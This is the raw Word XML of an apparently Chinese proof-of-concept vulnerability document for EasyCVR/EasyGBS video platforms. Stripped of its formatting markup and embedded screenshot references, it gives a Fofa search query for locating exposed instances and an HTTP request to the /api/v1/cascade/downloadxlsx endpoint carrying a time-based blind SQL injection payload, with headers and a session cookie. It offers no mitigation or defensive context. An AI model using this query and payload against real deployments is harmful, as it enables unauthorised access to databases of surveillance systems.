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DF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Fofa：(body="EasyGBS" || body="EasyDarwin.Body" || body="EasyCVR") &amp;&amp; (title="" || title="EasyCVR")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424CD964">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C31AA8E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74BB7EA1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8"/>
          <w:szCs w:val="18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/api/v1/cascade/downloadxlsx?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'and(select*from(select/**/sleep(5))a/**/union/**/select+1)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'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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F581E4D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</w:p>
    <w:p w14:paraId="2581EF2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Cache-Control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max-age=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F01636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Upgrade-In</w:t>
      </w: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secure-Requests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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F909EB5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Chrome/142.0.0.0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Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD932A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text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02637B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deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556419DE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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Cookie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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>token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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>iLHaZhzvg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D678A84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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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8"/>
          <w:szCs w:val="18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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5AEC0">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C66CDD3">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2027555"/>
            <wp:effectExtent l="0" t="0" r="317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392CB"/>
    <w:p w14:paraId="176D06A3">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259070" cy="1567180"/>
            <wp:effectExtent l="0" t="0" r="1778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2BFC4"/>
    <w:p w14:paraId="2B6FF9F9"/>
    <w:p w14:paraId="7545C20D"/>
    <w:p w14:paraId="2B0FAA90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45AC6"/>
    <w:rsid w:val="10112A37"/>
    <w:rsid w:val="18E4058A"/>
    <w:rsid w:val="1AD63A7C"/>
    <w:rsid w:val="1B561421"/>
    <w:rsid w:val="1EC34125"/>
    <w:rsid w:val="2BB54D92"/>
    <w:rsid w:val="3F960A00"/>
    <w:rsid w:val="4A7E7B74"/>
    <w:rsid w:val="705C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585</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>615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2025-10-22T02:59:00Z</dcterms:created>
  <dc:creator>DELL</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:37:16Z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2687E9EC69FE456088F1BBC92E62E430_12</vt:lpwstr>
  </property>
</Properties>
</file>